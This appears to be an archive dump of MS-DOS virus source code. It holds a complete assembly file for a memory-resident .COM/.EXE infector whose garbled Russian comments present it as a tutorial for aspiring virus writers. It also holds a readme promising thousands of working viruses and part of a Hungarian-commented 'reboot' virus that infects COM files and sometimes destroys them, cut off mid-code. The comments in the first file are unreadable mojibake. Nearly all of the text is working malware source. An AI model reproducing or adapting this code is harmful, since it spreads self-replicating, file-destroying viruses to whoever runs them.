;®¡¥é ¥â ¯à¨ ॠªæ¨¨ ¤¥â¥ªâ®à  ª ª®£®, «ì áâ®à®¦  ¢¥§¤¥áã饣®,¬ è¨­¥ ¢¨­â
;­  *beep ®¯ã᪠âì!® ¢á¥ íâ® ¯®«­ ï *beep­ï!®á«ã蠩⥠¡à âæë ‚¨à¬ ª¨ --
;­¥ ¢ â¨à ¦¥ áç áâì¥,  ¢ ªà á®â¥  «£®à¨â¬ !!!¥å © «®¢ïâáï ¢ è¨ §¢¥à¨ ¢á直¬¨
;ॢ¨§®à ¬¨,¯ãáâì ä®à¬ â¨â à ᢮¨ ¢¨­âë.Ž 祬 ¡®«ìè¥ ­ á ⥬ ¬¥­ìè¥ î§¥à®¢!
;(ˆ¡® ¬­®£¨¥ ¨§ ­ á ¥é¥ ­¥ ¯®§ ¡ë«¨ Basic).€ «¥ç¨«ª¨ ¢á直¥ - ®­¨ ­ ¬ §¥¬«î
;à áç¨é îâ,¤«ï ­®¢ëå "¯®á ¤®ª"!
; ® ᨥ ¢á¥ 梥â®çª ¬¨ ®¡§ë¢ ¥âáï!€ ¢®â ¯à¥¤á⠢⥠ᥡ¥,çâ® á¬ëè«¥­­ë© ¬ «ë©
;¦¥« ¥â ­ ¯¨á âì ¯¥à¢®¥ ᢮¥ ¯à®¨§¢¥¤¥­¨¥,  ­¥â ã ­¥£® ­¨ ⥮ਨ ­¨ ¬ â¥àëå
;ª®à¥è¥©-‚¨à¬ ª®¢!‚®â ¨ ¯à¨è«®áì ¬­¥ á®áâ ¢«ïâì ¯®á®¡¨¥-¤«ï-­ ç¨­ îé¨å.
;ë« íâ® ¢¨àãá RCE-666 (¬­®î ¯¨á ­).Aidstest ¥£® ª«¨ç¥â: INFO /666,Web: Die-666.
;­® ¯®â®¬ ®¡à¥§ ¢ ¥£® ¬ «¥­ìª®,¯®«ã稫 ï RCE-385!
;  ¤¥îáì,çâ® Ž ¤«ï ­®¢¨çª®¢- ã祡­¨ª®¬ áâ ­¥â,  ¤«ï £®á¯®¤ « ¬¥à®¢ - ¤®á⮩-
;­ë¬ ¯®«¨£®­®¬!
;-----------------------------------------------------------------------------
;(c) Light General.Kiev.1995. STEALTH group . For free use!
;-----------------------------------------------------------------------------
cseg segment
assume cs:cseg,ds:cseg
org 100h
start:
nop ; ਧ­ ª § à ¦¥­¨ï .COM ä ©« .
jmp virr
; Ÿª®¡ë § à ¦¥­­ ï ¯à®£à ¬¬ .(‡ ­¨¬ ¥â 30 ¡ ©â).
nop
nop
mov ah,09
lea dx,wrn
int 21h
mov ax,4c00h
int 21h
;--------------------------------------
wrn db 'FRODO LIVES!$'
;--------------------------------------
;################# VIRUS ##################
virr:
call $+3
pop si
sub si,03
;-Hacked mem.-----------------------------------------------------
push si
clc
mov ax,0FEFEh ; ஢¥à塞 ¯ ¬ïâì ­  § à ¦¥­­®áâì!
int 21h ; Š®«¨ ¢¨àãá “†… ᨤ¨â ¢ ¬ è¨­¥ â® ®­
jc exit_v ; ¯®¤­¨¬¥â ä« £ CF!
;- ‘«¥¤ãîé ï ç áâì ª®¤  ¯à®¨§¢®¤¨â "®âªãá뢠­¨¥" 512 ¡ ©â ¯ ¬ïâ¨!-------------
; ਭ樯 í⮣® "®âªãá뢠­¨ï" ®á­®¢ë¢ ¥âáï ­  ⮬,çâ® ¯à¨ ¢ë¯®«­¥­¨¨ ¯à®£à ¬¬ë
;á¨á⥬  áâந⠯¥à¥¤ ¥¥ ª®¤®¬ â ª¨¥ ¡«®ª¨ (®¡à â¨â¥ ¢­¨¬ ­¨¥ ­  ¢ë¤¥«¥­­ë¥
;ç áâ¨)
;---(1)--- MCB - Memory Control Block («®ª ã¯à ¢«¥­¨ï ¯ ¬ïâìî)
; Ž¡ëç­® ¢ â ª¨å ¡«®ª å DOS ®¯¨á뢠¥â ¢ë¤¥«¥­­ë¥ ¯à®£à ¬¬ ¬ ãç á⪨ ¯ ¬ïâ¨!
; ”ŽŒ€’ :
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘¬¥é¥­¨¥ ï祩ª¨ ®â ³ „«¨­  ³  §­ ç¥­¨¥
; ­ ç «  ¡«®ª . ³ ³
; ³ ³
; 00 ³ 1b ³ …᫨ á⮨â 'M' â® íâ®â ¡«®ª ­¥ ¯®á«¥¤­¨©
; ³ ³ 'Z' ¯®á«¥¤­¨©.
; 01 ³ 1w ³ ‘¥£¬¥­â­ë©  ¤à¥á (á ª®â®à®£® ¢ë¤¥«¥­ ¡«®ª).
;++++> 03 ³ 1w ³ „«¨­  ¡«®ª  ¢ ¯ à £à ä å (¯ à £à ä = 16 ¡ ©â)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;„ «ìè¥ ¨¤ãâ ¥é¥ ¤ ­­ë¥,­® ­ á ¨­â¥à¥áã¥â ⮫쪮 íâ®! ÄÄÄÄÄÄÄÄÄÄÄÄ
;
;---(2)--- PSP - Program Segment Prefix (à¥ä¨ªá ¯à®£à ¬¬­®£® ᥣ¬¥­â )
; ‘¤¥áì ᮤ¥à¦¨âáï ¨­ä®à¬ æ¨ï ¤«ï § ¯ã᪠¥¬®© ¯à®£à ¬¬ë!
; ”ŽŒ€’ :
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘¬¥é¥­¨¥ ï祩ª¨ ®â ³ „«¨­  ³  §­ ç¥­¨¥
; ­ ç «  ¡«®ª . ³ ³
; ³ ³
; 00 ³ 1w ³ ‚ í⮬ á«®¢¥ á⮨⠪®¬ ­¤  int 20h (CD 20h)
;++++> 02 ³ 1w ³ Ž¡é¨© à §¬¥à ¯ ¬ï⨠¢ë¤¥«¥­­ë© ¯à®£à ¬¬¥!
; ³ ³ (ਠ§ ¯ã᪥ ¯à®£à ¬¬ë DOS ¢ë¤¥«ï¥â ¥© ¢áî
; ³ ³ ¯ ¬ïâì "¤® ª®­æ " 640 ª¨«®¡ ©â!)
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;„ «ìè¥ ¨¤ãâ ­¥ ¨­â¥à¥áãî騥 ­ á ¤ ­­ë¥! ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;-- ’ ª ¢®â,®â­¨¬ ï ­¥ª®â®à®¥ §­ ç¥­¨¥ ®â ¢ë¤¥«¥­­ëå ï祥ª,¬ë ¬®¦¥¬ ᤥ« âì
;"¤ëàªã" ¢ áâ àè¨å  ¤à¥á å ¯ ¬ï⨠¨ ¯¥à¥­¥á⨠â㤠 ⥫® ¢¨àãá !
; à ªâ¨ç¥áª ï ॠ«¨§ æ¨ï :
mov ax,ds
dec ax
mov es,ax
sub word ptr es:[03],35 ;* 512b
sub word ptr ds:[02],35 ;* 512b
mov es,ds:[02] ; ES = ᥣ¬¥­â­.  ¤à. "®âªãè." ¯ ¬ïâ¨!
push ds cs
pop ds
xor di,di
mov cx,offset ax_len-offset virr ; „«¨­  ¢¨àãá !
rep movsb ; ¥à¥­®á¨¬ ¢¨àãá ¢ "®âª." ¯ ¬ïâì!
;-Install int.----------------------------------------------------
mov al,21h
mov dx,offset int_21h_entry-offset virr
mov si,offset ofs_21h-offset virr
push es
pop ds
call inst_int ; “áâ ­®¢¨¬  ¤à¥á int 21h ­  ᢮©
; ®¡à ¡®â稪.
pop ds
exit_v:
push ds
pop es
pop si
;- COM or EXE ?---------------------------------------------------
; ஢¥à¨¬ ¨§ ª ª®£® ä ©«  ¬ë áâ à⮢ «¨?
; â® ¤¥« ¥âáï ¯®â®¬ã,çâ® ¯¥à¥¤ ç  ã¯à ¢«¥­¨ï .COM ¨«¨ .EXE ¯à®£à ¬¬¥
; ¯à®¨á室¨â ¯® à §­®¬ã!
cmp byte ptr cs:[si+offset origin_2_byte-offset virr+1],'Z'
jz L_exe
;-‚ocáâ ­®¢¨âì âਠ¡ ©â  ‡..-------------------------------------
; “ .COM ä ©«  ­ ¤®¡­® ¢®ááâ ­®¢¨âì ç¥âëॠ¯¥à¢ëå ¡ ©â  ª®â®àë¥ ¬ë ¨§¬¥­¨«¨
; ¯à¨ § à ¦¥­¨ï ä ©«  ­  ¤¨áª¥!(Œë § ¯¨á «¨ â㤠 ª®¬ ­¤ã ¯¥à¥å®¤  ­  ¢¨àãá).
mov di,100h
add si,offset origin_2_byte-offset virr
; SI =  ¤à¥á ¡ãä¥à  á ®à¨£¨­ «ì­ë¬¨ ¡ ©â ¬¨ .COM ä ©« !
push di
movsw
movsw
xor ax,ax
ret ; Go to infected com program.
;-Loaded from exe file.--------------------------------------------
; € ¢®â í⮠ᯮᮡ  ªâ¨¢ æ¨¨ .EXE ¯à®£à ¬¬ë!
; ‘¤¥áì ¯à®¨á室¨â ¢á¥ ¨­ ç¥ : â.ª. ¯à¨ § à ¦¥­¨¨ ä ©«  ¬ë ¨§¬¥­¨«¨ ¢ ­¥¬
; § £®«®¢®ª ª®â®àë© ãª §ë¢ ¥â á ª ª®£®  ¤à¥á  íâ®â ä ©« § ¯ã᪠îâ!
; (Šâ® ­¥ §­ ¥â,çâ® â ª®¥ § £®«®¢®ª .EXE ä ©«  ¯ãáâì ®¡à â¨âáï ª ª­¨£¥ .€¡¥«ï
; "Ÿ§ëª €áᥬ¡«¥à  ¤«ï IBM PC ¨ ¯à®£à ¬¬¨à®¢ ­¨ï" (áâà. 362)
L_exe:
mov ax,es
add ax,10h
add cs:[offset CS_file-offset virr][si],ax
; ’ ª ¬ë ¢ëç¨á«¨«¨ ᥣ¬¥­â ¢ ª®â®àë© ­ ¤® ¯¥à¥¤ âì ã¯à ¢«¥­¨¥!
db 0eah ;-
IP_file dw ? ;- JMP Far CS_file:IP_file
CS_file dw ? ;-
;------------------------------------------------------------------
; € í⮠ᮡá⢥­­® ç áâì ®â¢¥ç îé ï §  § à ¦¥­¨¥ ¯à®£à ¬¬!
int_21h_entry proc
cmp ax,0FEFEh ;-…᫨ ᮡà â á¯à è¨¢ ¥â ® ­ «¨ç¨¨
jnz _@1 ;-᢮¥© த­¨ â® ¤ âì ¤à㦥᪨© ®â¢¥â.
stc ;-
int_24h_entry:
mov al,03
retf 2
_@1:
cmp ax,4b00h ; …᫨ DOS ¯ëâ ¥âáï ¢ë¯®«­¨âì ¯à®£à ¬¬ã
jnz exit_all ; â® ¬ë § à ¦ ¥¬ ¥¥!
jmp infecting ;
exit_date:
mov ax,5701h ; “áâ ­®¢ª  áâ à®© ¤ âë ä ©« .
mov cx,es:[di+13] ;<- Time
mov dx,es:[di+15] ;<- Date
int 21h
exit_close:
mov ah,3eh ; ¥à¥¤ ¯¥à¥¤ ç¥© ã¯à ¢«¥­¨ï DOS'ã -
int 21h ; § ªà®¥¬ ä ©« ª®â®àë© § à ¦ «¨!
exit_pop:
lds dx,cs:[offset ofs_24h-offset virr]
mov ax,2524h ; “áâ ­®¢¨¬ ­  ¬¥áâ® int 24h
int 21h
pop bp
pop ds
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
exit_all:
db 0eah
ofs_21h dw 0000
seg_21h dw 0000
int_21h_entry endp
;-------------------------------------------------------------------
infecting:
push ax
push bx
push cx
push dx
push si
push di
push es
push ds
push bp
push ds
push dx
;------------------------------------------------------------------
; ¥à¥áâ ¢¨¬  ¤à¥á ¢¥ªâ®à  int 24h ­  ­ è ®¡à ¡®â稪 - â.¥. ­  ¯à®áâãî
; § £«ãèªã,ª®â®à ï ¢ á«ãç ¥ "§ ª«¥¥­®©" ¤¨áª¥âë ­¥ ¯®§¢®«¨â DOS'ã ªà¨ç âì :
; Write protect error ...
mov al,24h
mov si,offset ofs_24h-offset virr
mov dx,offset int_24h_entry-offset virr
call inst_int
pop dx
pop ds
;-Open file...-----------------------------------------------------
mov ax,3d00h
int 21h
jc exit_pop
;-Read header (EXE) or first 4 byte (COM).-------------------------
mov bh,3fh
xchg ax,bx
mov cx,18h
push cs
pop ds
mov dx,offset origin_2_byte-offset virr
mov si,dx
int 21h ; ‘ç¨â뢠¥¬ ¢ ¡ãä¥à 24 ¯¥à¢ëå ¡ ©â  ¯à®£à ¬¬ë!
_1:
jc exit_close ; …᫨ ®è¨¡ª ,â® § ªà®¥¬ ä ©« ¨ ¢ë©¤¥¬.
;-Look SFT file!-----------------------------
; ‘®¡á⢥­­® £®¢®àï, ¤ «¥¥ ¨¤¥â "¨§î¬¨­ª " ¢¨àãá  - ¨§-§  ­¥¥ ®­ ¨¬¥¥â â ª¨¥
;¬ «ë¥ à §¬¥àë!ˆ â ª,çâ® ¦¥ íâ® :
; ˆ§¢®«¨â¥ «¨ ¢¨¤¥âì ï ¢¥á쬠 «¥­¨¢,¨ ­¥ ®ç¥­ì «î¡«î ¢®§¨âáï á â ª¨¬¨
; àã⨭ ¬¨ ª ª á­ï⨥ ¨ ãáâ ­®¢ª   âਡã⮢,¯¥à¥¬¥é¥­¨¥ ä ©«®¢®£® 㪠§ â¥«ï!
; € ¯®á¥¬ã à áª®¯ « ï ¢­ãâ७­îî ¯®¤à®¡­®áâì DOS' !
; (Ž­  㯮¬¨­ ¥âáï ¢ à ¡®â¥ Š.ƒ.”¨­®£¥­®¢  "‘ ¬®ãç¨â¥«ì ¯® á¨á⥬­ë¬ äã­ªæ¨ï¬
; MS-DOS" (áâà. 67) (  â ª ¦¥ ¢ í«¥ªâà®­­®¬ á¯à ¢®ç­¨ª¥ Help PC)
; (‚¯¥à¢ë¥ ¯à¨¬¥­¥­® ¢ RC-0-512 (666,Written by Dark Avenger.)
; â® SFT -- System File Table - (‘¨á⥬­ ï â ¡«¨æ  ®âªàëâëå ä ©«®¢.)
;Ž­  ᮧ¤ ¥âáï ¤«ï ¢­®¢ì ®âªà뢠¥¬®£® ä ©«  ¨ ᮤ¥à¦¨â ¨­ä®à¬ æ¨î ¨á¯®«ì§ã¥¬ãî
;­¥¯®á।á⢥­­® ¯à®æ¥¤ãà ¬¨ § ¯¨á¨/áç¨â뢠­¨ï DOS' !!!
;
; ”ŽŒ€’ :
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ‘¬¥é¥­¨¥ ï祩ª¨ ®â ³ „«¨­  ³  §­ ç¥­¨¥
; ­ ç «  ¡«®ª .(„¥á.) ³ ³
; ³ ³
; 00 ³ 1w ³ Š®«-¢® ¤¥áªà¨¯â®à®¢ § ªà¥¯«¥­­ëå §  ä ©«®¬
; 02 ³ 1b ³ ¥¦¨¬ ¤®áâ㯠 § ¤ ­­ë© ¯à¨ ¥£® ®âªàë⨨
; 04 ³ 1b ³ €âਡãâë ä ©« 
; 11 ³ 1w ³ ®¬¥à ¯¥à¢®£® ª« áâ¥à  ä ©« 
; 13 ³ 1w ³ ‚à¥¬ï ¯®á«¥¤­¥© ¬®¤¨ä¨ª æ¨¨ ä ©« 
; 15 ³ 1w ³ „ â  ...
; 17 ³ 2w ³ „«¨­  ä ©« 
; 21 ³ 2w ³ “ª § â¥«ì ¢ ä ©«¥
; 32 ³ 11b ³ ˆ¬ï ¨ à áè¨à¥­¨¥ ä ©«  (¡¥§ '.')
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
mov ax,1220h ; ‘¥© ãç áâ®ç¥ª ª®¤  ¯®§¢®«ï¥â
push bx ; ¯®«ãç¨âì  ¤à¥á SFT ¢ ¯ à¥ ES:DI
int 2fh ;
mov bl,es:[di] ;
mov ax,1216h ;
int 2fh ;
pop bx ;
mov byte ptr es:[di+2],02 ; ‚ˆŒ€ˆ…!⨬ ¤¥©á⢨¥¬ ¬ë
;ᤥ« «¨ â ª,ç⮠⥯¥àì DOS
;áç¨â ¥â,çâ® ä ©« ®âªàëâ ¤«ï
;§ ¯¨á¨/áç¨â뢠­¨ï!
; ’.¥. ­ ¬ ­¥ ¯®­ ¤®¡¨«®áì
;á­¨¬ âì  âਡãâë ä ©« !
mov bp,es:[di+17] ; BP = file len!
;---------------------------------------------
; ’¥¯¥àì ¯à®¢¥à塞 ¡ ©âë ª®â®àë¥ áç¨â «¨ ¢ ¡ãä¥à.
lodsb
dec si
cmp al,'M' ; MZ - ¯à¨§­ ª ⮣®,çâ® íâ® .EXE ä ©«!
jz _EXE
cmp al,90h ; NOP - ¥á«¨ íâ® .COM ä ©« â® ¯à®¢¥à¨¬ ¥£® ­ 
; ¯®¢â®à­ãî § à ¦¥­­®áâì!(‘¬®âà¨â¥ ¢ ­ ç «®)
_1d:
jz exit_close
;-Infect .COM --------------------------------
; ’ ª § à ¦ îâ .COM ä ©«ë!
xchg ax,bp
cmp ax,65000
ja exit_close ;„«¨­  ¡®«ìè¥ ¤®¯ãá⨬®©.
mov es:[di+21],ax ;‘â ¢¨¬ ä ©«®¢ë© 㪠§ â¥«ì ¢
;ª®­¥æ ä ©« !
;-Make JMP------------------------------------
; ’.ª. ¯à¨ § à ¦¥­¨¨ ¬ë ¢¯¨á뢠¥¬ ¢ ­ ç «® .COM ä ©«  ¯¥à¥å®¤ ­  ⥫® ¢¨àãá  â®
;¬ë ¤®«¦­ë ¢ëç¨á«¨âì ᬥ饭¨¥ í⮣® ¯¥à¥å®¤ !
sub ax,04
mov ds:[offset jmp_n-offset virr],ax
call write_virus ; ¨è¥¬ ¢¨àãá ¢ ª®­¥æ ä ©« !
mov cx,04h ; € ⥯¥àì ¯¨è¥¬ ¢ ­ ç «® ä ©«  â®â á ¬ë©
mov dx,offset new_3_byte-offset virr ; ¯¥à¥å®¤!
exit_write:
mov ah,40h
int 21h
_1b: jmp exit_date
;-Sub. for write virus body (only) in file.----
write_virus proc
xor dx,dx
mov ah,40h
mov cx,offset ax_len-offset virr
int 21h
mov es:[di+21],dx ; F.P = start file!
mov es:[di+23],dx
cmp ax,cx
jnz _1c
ret
_1c:
pop ax
jmp _1b ; exit_date!
write_virus endp
;-Infect .EXE ---------------------------------
_EXE:
; € ⥯¥àì ¢ëáç¨â ¥¬ ¤«¨­ã ä ©« , ¨áå®¤ï ¨§ ¤ ­­ëå § ¯¨á ­­ëå ¢ § £®«®¢ª¥
; .EXE ä ©« ! ˆ ¥á«¨ ®­  ­¥ ᮩ¤¥âáï á § ¯¨á ­®© ¢ SFT, â® ¬ë áç¨â ¥¬,çâ®
; íâ® ä ©«, ᮤ¥à¦ é¨© ­¥ï¢­ë© ®¢¥à«¥© ¨ ­¥ § à ¦ ¥¬ ¥£®!
mov ax,ds:[si+4] ; Pages (512b).
dec ax
mov cx,512
mul cx
add ax,[si+2] ; AX = File len from header.
cmp ax,bp ; Real file len = ax ?
jnz _1b ; No - this is overlay.
;-----
mov es:[di+21],ax ; “ª § â¥«ì ¢ ª®­¥æ ä ©« .
mov es:[di+23],dx
;-Get header.-----------------------------------
; ‡ ¯®¬¨­ ¥¬  ¤à¥á á ª®â®à®£® ¬ë ¡ã¤¥¬ § ¯ã᪠âì .EXE ¯à®£à ¬¬ã!
mov ax,[si+14h]
mov ds:[offset IP_file-offset virr],ax
mov ax,[si+16h]
mov ds:[offset CS_file-offset virr],ax
;-----------------------------------------------
; ‚ëç¨á«¨¬ ­®¢ë©  ¤à¥á (â.¥. ¤«ï § ¯ã᪠ ¢¨àãá  ¯à¨ áâ à⥠¯à®£à ¬¬ë)
xchg ax,bp
mov cx,10h
div cx
sub ax,[si+8]
sbb dx,0
mov [si+16h],ax ; ReloCS.
mov [si+14h],dx ; ExeIP.
;-Correcting file len in header.----------------
;’¥¯¥àì ®âª®à४â¨à㥬 ¤«¨­ã ¢ § £®«®¢ª¥ .EXE ä ©« !
;(…„“…†„€ž!„«¨­  ¢¨àãá  = 385 ,  ¬ë 㢥«¨ç¨¢ ¥¬ ¤«¨­ã ä ©«  ¢ § £®«®¢ª¥
; ­¥ ­  385 ,  ­  512!!!’.¥. ⥯¥àì ¤à㣨¥ "ã¬­ë¥ ¢¨àãáë" ­¥ ¡ã¤ãâ § à ¦ âì
; íâ®â ä ©«).‘®¡á⢥­­® £®¢®àï íâ  ®á®¡¥­­®áâì ï¥âáï ¯à¨§­ ª®¬ § à ¦¥­¨ï,-
; ¬ë ¢¥¤ì ­¥ § à ¦ ¥¬ ®¢¥à«¥¨!
inc word ptr ds:[si+4]
;-Write virus to file.--------------------------
call write_virus
;-Write new header.-----------------------------
mov cx,18h
mov dx,si ; DX = offset header.
jmp exit_write ; ®¤£®â®¢¨¢ ¢á¥ ª § ¯¨á¨ ¨á¯à ¢«¥­­®£®
;§ £®«®¢ª  ¬ë ¯¥à¥¤ ¥¬ ã¯à ¢«¥­¨¥ ¯àאַ
;­  ª®¬ ­¤ã int 21h!
;----------------------------------------------
inst_int proc
mov ah,35h
int 21h
mov ds:[si],bx
mov ds:[si+2],es
mov ah,25h
int 21h
ret
inst_int endp
new_3_byte db 90h ; NOP
db 0e9h ; JMP nn
jmp_n dw 0000 ; nn
;-Header for EXE file & buffer for first 5 bytes COM's file.--
origin_2_byte:
header:
db 4 dup (90h) ; NOPs
ax_len db ?
db 20h dup (?) ; For EXE header.
ofs_24h dw ?
seg_24h dw ?
;********************************************************
cseg ends
end start
;-- Written by Light General.Kiev.1995.For free use! ----
MSDOS/R-Index/Virus.MSDOS.Unknown.readme.txt
+19
View File
@@ -0,0 +1,19 @@
Rhys' Virii Archives:
~~~~~~~~~~~~~~~~~~~~~~~
This is one of many ZIP archive files that, all together, contain
literally thousands of working, running virii. Enjoy.
Please note that I have safely kept these on my hard drive as
uncompressed program files and have yet to be infected by one
of these.
All you must do to avoid infection is make sure that no idiot
runs these.
These virii are for educational uses only. I will not be
responsible for what you do with these.
Once again, Enjoy!
-Rhys
MSDOS/R-Index/Virus.MSDOS.Unknown.reboot.asm
+230
View File
@@ -0,0 +1,230 @@
PAGE ,132
VIRUS SEGMENT PARA PUBLIC 'CODE'
ASSUME CS:VIRUS,DS:VIRUS
HOSSZ EQU VEG-KEZDET
KEZDET EQU $
INDIT: PUSH CX
TBLC: MOV DX,OFFSET TABL
CLD ; SZTRINGMUVELETEK NOVEKVO IRANYBA
MOV SI,DX ; SI TARTALMAZZA A TABLAZAT KEZDOCIMET
ADD SI,OFFSET FILKEZ-TABL
MOV DI,100H ; AZ ELSO HAROM BYTE VISSZAALLITASA
MOV CX,3
REPZ MOVSB
MOV SI,DX ; SI-BE ISMET A TABLAZAT KEZDOCIME
MOV AH,30H ; A DOS VERZIOSZAM LEKERDEZESE
INT 21H
CMP AL,0 ; MEG AZ 1.X VERZIO?
JNZ IND1 ; NEM
JMP IND2 ; IGEN, A VIRUS NEM TUD TERJEDNI
IND1: PUSH ES ; ES ELMENTESE
MOV AH,2FH ; A DTA CIMENEK LEKERDEZESE
INT 21H ; ES ELTAROLASA A TABLAZATBAN
MOV WORD PTR [SI+DTACIM-TABL],BX
MOV WORD PTR [SI+DTACIM-TABL+2],ES
POP ES ; ES VISSZAOLVASASA
MOV DX,UJDTA-TABL
ADD DX,SI ; A DTA UJ CIMENEK BEALLITASA
MOV AH,1AH
INT 21H
PUSH ES ; REGISZTEREK ELMENTESE
PUSH SI
MOV ES,DS:2CH ; A DOS KORNYEZET CIME
MOV DI,0 ; ELEJETOL
IND3: POP SI ; SI VISSZAOLVASASA
PUSH SI ; ES VISSZAIRASA
ADD SI,OFFSET SZOVEG-TABL
LODSB ; EGY KARAKTER BETOLTESE
MOV CX,8000H ; A KORNYEZET MAX. 32K
REPNZ SCASB ; AZ ELSO KARAKTER KERESESE
MOV CX,OFFSET FSPEC-SZOVEG-1
IND4: LODSB ; A KOVETKEZO KARAKTER BEOLVASASA
SCASB ; ES ELLENORZESE
JNZ IND3 ; NEM EGYEZIK
LOOP IND4 ; FOLYTATNI
POP SI ; A REGISZTEREK VISSZAALLITASA
POP ES
MOV [SI+UTCIM-TABL],DI
MOV DI,SI ; DI-BE A TABLAZAT KEZDOCIME
ADD DI,OFFSET FSPEC-TABL
MOV BX,SI ; SI ELMENTESE BX-BE
ADD SI,OFFSET FSPEC-TABL
MOV DI,SI
JMP SHORT IND5 ; KERESES ELOSZOR AZ AKTUALIS ALKONYVTARBAN
INDE: CMP WORD PTR [SI+UTCIM-TABL],0
JNZ IND6 ; VAN MEG TOBB UT
JMP IND7 ; MINDEN LEHETSEGES FILE FERTOZOTT
IND6: PUSH DS ; A REGISZTEREK ELMENTESE
PUSH SI
MOV DS,ES:2CH ; DS-BE A DOS KORNYEZET SZEGMENSE
MOV DI,SI ; DI A TABLAZATRA MUTAT
MOV SI,WORD PTR ES:[DI+UTCIM-TABL]
ADD DI,OFFSET FSPEC-TABL
IND8: LODSB ; EGY KARAKTER BETOLTESE
CMP AL,3BH ; ';' AZ UTAKAT VALASZTJA EL
JZ IND9 ; ANNAK A KODJA
CMP AL,0 ; A LEZARO NULLA?
JZ INDA ; AZ A KOD
STOSB ; ELTAROLAS
JMP SHORT IND8 ; FOLYTATNI
INDA: MOV SI,0 ; TOBB UT NEM LETEZIK
IND9: POP BX ; BX A TABLAZAT KEZDOCIME
POP DS ; DS VISSZAALLITASA
MOV [BX+UTCIM-TABL],SI
CMP BYTE PTR [DI-1],5CH ; A FILE SPECIFIKACIO '\' LETT LEZARVA?
JZ IND5 ; IGEN
MOV AL,5CH ; A '\' KODJA
STOSB ; ELTAROLASA
IND5: MOV [BX+FAKT-TABL],DI
MOV SI,BX ; A TABLAZAT KEZDOCIME BX
ADD SI,OFFSET FKER-TABL ; KERESO NEV
MOV CX,OFFSET UTCIM-FKER
REPZ MOVSB ; ATMASOLASA A FILE SPECIFIKACIOBA
MOV SI,BX ; SI A TABLAZAT KEZDOCIME
MOV AH,4EH ; FILE KERESESE
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
MOV CX,11B ; A KERESETT ATTRIBUTUM
INT 21H
JMP SHORT INDC ; A KOVETKEZO RESZT ATUGRANI
INDF: MOV AH,4FH ; A KOVETKEZO FILENEV KERESESE
INT 21H
INDC: JNC INDD ; MEGTALALTUK
JMP INDE ; NINCS ITT TOBB HASONLO
INDD: MOV AX,[SI+UJDTA-TABL+22]
AND AL,11111B ; A LETREHOZAS IDEJENEK MASZKOLJUK A MASODPERCEIT
CMP AL,11111B ; 62 MASODPERC? /FERTOZEST EZZEL JELZI/
JZ INDF ; IGEN, TOVABB KELL KERESNI
CMP WORD PTR [SI+UJDTA-TABL+26],0FA00H
JA INDF ; TUL NAGY FILE, NEM FERTOZHETO
CMP WORD PTR [SI+UJDTA-TABL+26],0AH
JB INDF ; TUL KICSI FILE
MOV DI,[SI+FAKT-TABL]
PUSH SI ; A TABLAZAT KEZDOCIMENEK ELMENTESE
ADD SI,OFFSET UJDTA-TABL+30
INDG: LODSB ; A FILENEV ATMASOLASA A FILE SPECIFIKACIOBA
STOSB
CMP AL,0 ; A NEV ZARO NULLA?
JNZ INDG ; NEM, FOLYTATNI
POP SI ; A TABLAZAT KEZDOCIMENEK VISSZAALLITASA
MOV AX,4300H ; A FILE ATTRIBUTUM BEOLVASASA
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
MOV [SI+FILATT-TABL],CX
MOV AX,4301H ; A FILE ATTRIBUTUM BEALLITASA
DB 81H,0E1H,0FEH,0FFH ; AZ R/O BIT TORLESE
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
MOV AX,3D02H ; A FILE MEGNYITASA IRASRA & OLVASASRA
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
JNC INDH ; NINCS HIBA
JMP INDK ; HIBA TORTENT
INDH: MOV BX,AX ; A FILESZAM ATVITELE
MOV AX,5700H ; A KELETKEZESI IDO BEOLVASASA
INT 21H ; ES BEALLITASA
MOV [SI+FILIDO-TABL],CX
MOV [SI+FILDAT-TABL],DX
MOV AH,2CH ; A RENDSZERIDO BEOLVASASA
INT 21H
AND DH,111B ; A MASODPERCEK OSZTHATOK NYOLCCAL?
JNZ INDI ; NEM, A FILE-T CSAK MEGFEROZZUK
MOV AH,40H ; EZT A FILE-T MOST MEGGYILKOLJUK /HAHAHA/
MOV CX,5 ; A JMP FAR F000:FFF0 5 BYTE HOSSZU
MOV DX,SI ; DX A TABLAZAT KEZDETERE MUTAT
ADD DX,OFFSET RESET-TABL
INT 21H ; A FILE ELSO 5 BYTEJANAK ATALLITASA RESET-RE
JMP INDJ ; ENNEK MAR BEVEGEZTETETT
INDI: MOV AH,3FH ; OLVASAS A FILEBOL
MOV CX,3 ; AZ ELSO HAROM BYTE
MOV DX,FILKEZ-TABL ; A MEGFELELO CIMRE
ADD DX,SI
